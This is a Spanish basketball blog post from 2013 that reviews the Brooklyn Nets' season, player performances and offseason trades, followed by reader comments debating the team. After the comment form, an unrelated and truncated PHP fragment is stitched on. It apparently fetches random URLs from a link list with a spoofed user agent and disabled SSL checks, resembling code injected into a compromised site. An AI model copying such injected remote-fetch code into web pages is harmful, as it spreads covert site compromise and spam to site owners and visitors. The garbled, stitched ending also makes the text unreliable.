Brooklyn Nets: Aprobado

11 de July de 2013 por Esteban
Pasar de ser un equipo de lotería a ser el cuarto del Este y estar durante gran parte del año tercero no es poca cosa pero si tenemos en cuenta la inversión y la expectativa generada, parecen que los Nets se han quedado bastante cortos en el resultado final.

Los que no nos quedamos cortos ni de cerca fuimos nosotros que les dábamos segundos en el Este y finalistas de conferencia. Lo primero no quedó tan lejos, pues con algunas victorias más podrían haber sido segundos y su rendimiento no fue muy inferior al de sus vecinos Knicks, pero con lo de finalistas de conferencia si quedamos un poco en ridículo.

Como siempre, la imagen final termina siendo la que vale y si los Nets hubiesen sido derrotados por los Heat en semifinales de conferencia otra sería la historia pero quedar fuera en primera ronda frente a unos Bulls sin Rose termina siendo catastrófico.

Repasemos el año de los Nets. Arrancaron la temporada con un 11-4, Avery Johnson como entrenador del mes y un futuro bastante prometedor que duró solo eso, un mes. A partir de ese momento los Nets encajaron un 4-11 que coincidió en parte con la lesión de Lopez. El nivel de Gerald Wallace y Kris Humphries ya nos apuntaba lo que acabaría siendo su año y Joe Johnson en ese momento estaba tirando con un 30% de acierto. 

Poca paciencia en Brooklyn. Despido de Johnson y llegada interina de P.J. Carlesimo, quien devolvió la normalidad a un equipo de semejante calidad y que rápidamente se ubicó en el tercer puesto de conferencia y que aguantaron hasta el all-star.

Partidos más partidos menos, los Nets terminaron una buena liga regular. Vencieron a sus vecinos Knicks en algunas ocasiones y pudieron barrer a rivales inferiores aunque siempre quedaron en deuda con los rivales de fuste. Así quedó demostrado en playoffs donde unos aguerridos Bulls les vencieron a 7 juegos y les mandaron rápido de vacaciones.

En nuestro análisis previo hablábamos maravillas del 5 inicial (no era para menos con lo que cobraban) y también destácabamos su banca, demasiado buena para ser todos jugadores por el mínimo salarial. A la hora de la verdad, los titulares no estuvieron al nivel esperado y aunque parezca extraño, más de una vez durante la temporada fue la barata banca la que sacó la cara por ellos. CJ Watson ha cuajado una gran campaña y ya sha conseguido un mejor contrato en un mejor equipo como Indiana. Recordemos que solo cobraba poco mas de un millón de dólares. Qué decir de Keith Bogans quien ante las múltiples lesiones de Wallace terminó jugando muchos partidos de titular y aportando el triple que el equipo necesitaba. Hasta Stackhouse tuvo una rachita de partidos donde aportó lo suyo. Bajo los aros llegó la reivindicación de Andray Blatche, jugando el mejor básquet de su carrera y siendo candidato por momentos al mejor sexto hombre. Por un millón de dólares, pocos pueden darán rendimiento similar. A cambio de milloón y medio  Reggie Evans  dejó 11 rebotes por partido y una marca en el corazón de la afición. Si a estos 5 jugadores le sumamos lo aportado por MarShon Brooks, estamos hablando de 6 jugadores que en total cobraron entre todos unos 8 millones de dólares, el 10% de lo que se llevó su 5 inicial.

De estos hablamos a continuación:

PREMIOS

MVP: Brook Lopez fue el único all-star de un equipo que a priori esperaba tener 4 jugadores en dicho partido.  Este año hemos visto a otro Lopez, ha mejorado levemente su tasa de rebotes pero se ha hecho gigante con los tapones. La defensa sigue sin ser su fuerte pero al menos se esmeró más. En ataque solo Cousins podría discutirle el hecho de ser el pivote con más recursos ofensivos de la NBA. De cerca y de lejos mostró su calidad y consiguió un PER de eficiencia a la altura de James, Bryant, Paul y Durant, un lugar entre los grandes. En los PO se marcó 20 PP, frente a nada menos que Joakin Noah. No es Shaquille O`neal pero tampoco se puede decir que no haya cumplido con las expectativas.

Rookie: Terrible decepción la de Mirza Teletovic y su contrato multianual por la excepción de nivel medio, nunca peor gastada. No contó ni para Johnson ni para Carlesimo. ¿A que se debió? No se sabe, no se puede entender que con ese tamaño y ese tiro de 3 puntos haya calentado tanto la banca, una verdadera pena. Tyshawn Taylor dejo buenas impresiones aunque difícilmente los jóvenes tengan espacio de progresar en un equipo hecho a golpe de talonario. Me hubiese gustado ver algo mas a Tornika Shengelia, quien dejo enormes sensaciones en al liga de desarrollo.

Sorpresa: Andray Blatche era considerado un simple “hace-números” ede los finales de temporada que se había ganado con todo motivo una amnistía. Tan mala era su fama que en la subasta posterior nadie ofreció nada por él y fichó por el mínimo con los Nets. Como sexto hombre hizo el papel de entrar y producir ofensiva instantánea. No vale lo que los Wizards creyeron en algún momento, pero al menos dejó muestras de que su lugar es la NBA y que el talento sigue vigente. No sé ustedes pero a mi Reggie Evans no me ha sorprendido en absoluto. Hizo lo mismo que viene haciendo hace años y sigue siendo uno de los jugadores mas subestimados de la liga.

Decepción: Vamos a explayarnos.

Deron Williams. Al parecer dos años de recorrido por el desierto, sin PO y sin motivación han acabado con su carrera. Pensar que era mencionado en algún momento como el mejor base de la NBA y este año ni siquiera ha ido al All-Star. Pero no solo no ha ido, tampoco ha estado cerca de merecerlo y dudo que lo esté en un futuro. Hoy por hoy, Rondo, Rose, Irving y hasta Wall (y eso que se fue Holiday), por nombrar algunos de la conferencia Este, están por encima suyo. No jugó a lo CP3 como creador de espacios sinó que se vio obligado a jugar a lo Rose en un rol que no le sienta, el de cargar con la ofensiva del equipo. A sido a mi entender la decepción del año en la NBA. O cambia su imagen radicalmente este mismo año o hablaremos que su contrato es tóxico más temprano que tarde.

Joe Johnson
. Sabíamos que su contrato era malo pero creí que sería favorecido al pasar a ser segunda o tercera espada. Nada más alejado de la realidad. Fue el freno de mano de las ofensivas, el agujero negro. Bote, bote, bote y tiro y para colmo esos tiros no le entraron en todo el año. Sabe como definir juegos y lo hizo varias veces. Calidad le sobra pero es un pésimo defensor, un pésimo pasador y es pésimo en aceptar un rol secundario.

Gerald Wallace
jugó la peor temporada de su carrera justo después de firmar un jugoso y largo contrato. Al menos ya no se dejara ver por Brooklyn. Decadencia definitiva para un jugador que por tipo de juego fisico, edad y lesiones no volverá ser nunca lo que fue.

Kris Humpries
 firmó un contrato desproporcionado y fue usado de chivo expiatorio. Cuando las cosas empezaron a salir mal Johnson lo mandó al banco como culpándolo de que no jugaba al nivel que se esperaba de él. Se lo trató como a una estrella que no rendía cuando de estrella solo tenía el sueldo. Se sabía que podía aportar rebotes y algo de defensa y no mucho más pero los Nets querían que fuera una fuera de serie de la noche a la mañana. Si le hubiesen dado confianza podría haber aportado más pero prefirieron culparlo y lo destrozaron anímicamente. Lo mejor es su expiring que fue realmente bien aprovechado.

Avery Johnson:
El pequeño general firmó en 201o con los Netssabiendo que debería comerse unas pésimas temporadas hasta que se armara el equipo ganador de la 2012/2013. Cuando llegó su momento solo duró 30 partidos en el cargo con un 50% de balance.

Esfuerzo en vano: Quien sinó que Mikhail Prokhorov que ha gastado lo que las reglas del básquet le permitieron a fin de armar un súper equipo, 72 millones en sus 5 titulares el año pasado y este año se viene con un total  de 82 solo para el quinteto. Nadie puede decir que no le pone billetes y empeño en busca del anillo.

JUGANDO A GM

Que poco trabajo me han dejado aquí tras la salida de Humpries, Wallace, Bogans y Brooks camino a Boston y la llegada de nada más y nada menos que 3 campeones de la NBA como Terry, Pierce y Garnet, ¿qué mas se puede pedir?

Los Nets aprovecharon la incómoda situación en la que se encontraba Bosto. Estos querían librarse de Pierce y Garnett pero cancelar sus contratos o enviarlos a equipos de lotería no era una forma elegante de hacerlo. Los Celtics siquiera ganan demasiado en el trade, puesto que se llevan el tóxico contrato de Wallace, pero este último es más fácil de traspasar o maltratar que sus leyendas.

El 5 inicial es de antología en cuanto a nombres:

Williams-JoJo-Pierce-Garnett-Lopez

Jason Terry saltará desde el banco para jugar de 1/2 y Shaun Livingston, incorporación también de esta temporada, ejercerá algunos minutos de base suplente. Reggie Evans jugará muchos minutos como 4 de recambio y Mirza Teletovic deberá demostrar de alguna manera porqué cobra tanto dinero. Andray Blatche será el 5 de recambio, completando así una rotación interior muy buena, con muchisimo gol en el 5 inicial y con recursos aceptables desde la banca.

El entrenador será el debutante en los banquillos Jason Kidd que es solo 3 años mayor que Kevin Garnett. Yo hubiera preferido un Van Gundy o Sloan en su lugar.

Para mi gusto faltaría un defensor que no mire el aro estilo Ronnie Brewer para jugar de titular. Jason Terry y Joe Johnson saliendo desde el banco pueden ser la respuesta.

Comenta

16 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Excelente análisis de la situación Esteban! Felicidades

      Citar

  2. lost dice:
    #2

    Para mi es un suspenso. Vale que pasaron de un equipo de lotería a un cabeza de serie, pero hay que matizarlo.
    1. Estan en la Conferencia Este, más fácil llegar a los POs, y si ya los Bulls faltan por la baja de su MVP…
    2. Firmaron sin sentido, dando contratazos a Crash y Humphries y tiraron la casa por la ventana por JoJo, que tampoco ha rendido
    3. Le dan el premio a Mejor Entrenador del Mes a Avery Johnson y a las 2-3 semanas lo han hechado. Como solución traen al incompetente de Carlesimo
    4. No jugaron a nada en la RS, equipo completamente anárquico que dependía del nivel de Deron y de JoJo, que estuvieron irregulares durante toda la temporada
    5. Dieron mucha pena cuando se enfrentaron a equipos buenos de la liga. Me acuerdo por ejemplo del día en que los Celtics visitaban el Barclays en Navidad
    6. Ridículo tremendo en POs, eliminados en casa en un Game 7 por un equipo al que le faltaba su MVP y Noah y Deng estaban al borde del KO. Podían haber cerrado la serie si no tiran a la basura en 3 min ese partido de las 3 OT.
    7. Han estado por debajo de Miami, Nueva York, Indiana y Chicago. Dices que el nivel mostrado por los Nets está no muy por debajo de los Knicks y ahí te equivocas mucho. Los Nets han dado pena, que tanto aquí como los especialistas americanos se los daba por contenders y la división atlántica estaba entre Nets-Celtics…

    Para la próxima temporada les veo por debajo aún de los 4 equipos del Este. Han mejorado el equipo para los POs pero no para la RS. Miami seguirá siendo Miami, ni Knicks ni Pacers han empeorado el equipo, y los Bulls recuperan a Rose. Para el bien de los Nets, que Kidd les salga cara, porque si no…

      Citar

  3. Denise dice:
    #3

    Para mi es un suspenso mayusculo. Equipo para llegar como mínimo a 2º ronda y se eliminan con factor cancha a favor contra unos Bulls sin Rose, Hinrich, Deng y con Noah tocado..

    PD: Txusma, te he mandado el analisis de los Blazers, se me ha olvidado ponerle la nota. Ponle un bien/suficiente.

      Citar

  4. Esteban dice:
    #4

    lost tienes razon en muchas cosas, pero tampoco hay q olvidarse de donde venian los NETS

    con dinero no es facil armar un equipo ganador pero ellos a medias lo lograron, no fueron contendientes serios, pero al menos lo parecieron en gran parte del año, algo es algo

      Citar

  5. Cocinitas dice:
    #5

    Pues a partir de hoy hay que sumarle a Kirilenko, telita con el equipo que está montando el ruso.

      Citar

  6. The wolf dice:
    #6

    Kirilenko rechazó una player option de $10 millones y ha firmado por $3.1… no se si le ha salido muy bien la jugada a no ser que el dinero sea algo secundario para él a estas alturas.

      Citar

  7. The wolf dice:
    #7

    Con lo que pagaran estos de impuesto de lujo podrían hacerse otro equipo… tremendo

      Citar

  8. Melo15 dice:
    #8

    No hay un limite para gastar dinero?
    Personalmente me dan un asco tremendo estos Nets, y espero que les vaya bastante mal.
    De todas maneras no sirve de nada tener 3 aleros buenos si van a jugar 15 minutos cada uno.

      Citar

  9. lost dice:
    #9

    Aunque Kirilenko es un gran fichaje y muy buen fit para el roster de los Nets (defensa, triple, juega de 3 y 4) creo que no fichan con cabeza. La adquisición de Pierce y Garnett, dos jugadores temibles en el 1 vs 1 con un base como Deron al que le gusta correr no lo veo. Además, creo que la última fue su gran temporada como jugadores llevando a los Knicks a 6 partidos.
    Sí hay límite Melo. Han fichado a AK con la MLE que les quedaba que en principio era para Bogdanovic.

    PD: Veo tanto a Nets como a Indiana un poco peores en Regular Season, que no en POs, que a Miami, Nueva York y Chicago. Por jugadores y por edad; los Bulls tienen una plantilla muy muy dura, y Nueva York ha rejuvenecido sacándose a Cambys y Wallaces. Indiana va hacer la misma RS que el año pasado o levemente peor.

      Citar

  10. lost dice:
    #10

    Y lo de la luxury tax me parece una burrada. Debería ser un castigo, por ejemplo, 10 millones en impuesto de lujo y pierdes una segunda ronda, 20 millones una primera ronda, o algo así, porque los mercados pequeños no pueden competir.

      Citar

  11. Esteban dice:
    #11

    Los nets estan pagando menos de lo que pagaron los lakers el año pasado

    Ahora con kirilenko me encanta el equipo

    Para ser campeones no les da, pero estan ahora si en la elite de la liga

    Fuerte confeencia este, miami, nets, pacers, knicks y bulls

    Todos muy mejorados respecto del año pasado, con granger, rose y los nuevos nets, cuidadome gusta el este

      Citar

  12. Denise dice:
    #12

    Melo15: No hay un limite para gastar dinero?Personalmente me dan un asco tremendo estos Nets, y espero que les vaya bastante mal.De todas maneras no sirve de nada tener 3 aleros buenos si van a jugar 15 minutos cada uno.

    No sé porque os echais las manos a la cabeza con el dinero de los Nets cuando en los últimos años, los Lakers, los Knicks, los Mavs, los Magic por ejemplo han andado mas o menos en esos mismos salarios

    Recuerdo una temporada hará como hace 6 años en los cuales, los Knicks estaban en 129 millones de salarios con gente como Randolph, Marbury, Curry, Francis y no llegaron ni a playoffs.

      Citar

  13. Simon dice:
    #13

    Esteban:

    Fuerte confeencia este, miami, nets, pacers, knicks y bulls

    Todos muy mejorados respecto del año pasado, con granger, rose y los nuevos nets, cuidadome gusta el este

    Lo único que ha pasado con el ESTE es que han concentrado todo el talento en 5 equipos… a partir de ahi el salto es terrible… puede que estemos ante el año en el que el sexto equipo de un conferencia tenga el peor nivel visto nunca en PO… Es que detrás de estos cinco quien viene? Cavs?? Detroit?? Wash?? no sé… son equipos en construccion pero con muchísimos defectos, aún más que virtudes…

      Citar

  14. Simon dice:
    #14

    Entiendase el peor nivel para un sexto clasificado, obvio que como octavos habrán entrado peores muchas veces.

      Citar

  15. Melo15 dice:
    #15

    Bueno tambien estan los Cavs que mal equipo no tienen y Atlanta si al final ficha a Teague habra dado un paso adelante respecto el año pasado.

      Citar

  16. Vader dice:
    #16

    Hombre los Cavs son jovenes pero es un equipazo, Detroit lo mismo, un frontcourt temible, y los Wizards si Wall esta sano son equipo de playoff y más si Porter les sale bueno… Luego los Bucks estaran ahí peleando tambien las últimas plazas junto a Hawks.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>